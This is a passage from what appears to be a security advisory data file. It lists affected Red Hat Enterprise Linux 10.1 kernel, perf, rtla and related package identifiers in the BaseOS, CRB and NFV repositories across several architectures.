"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
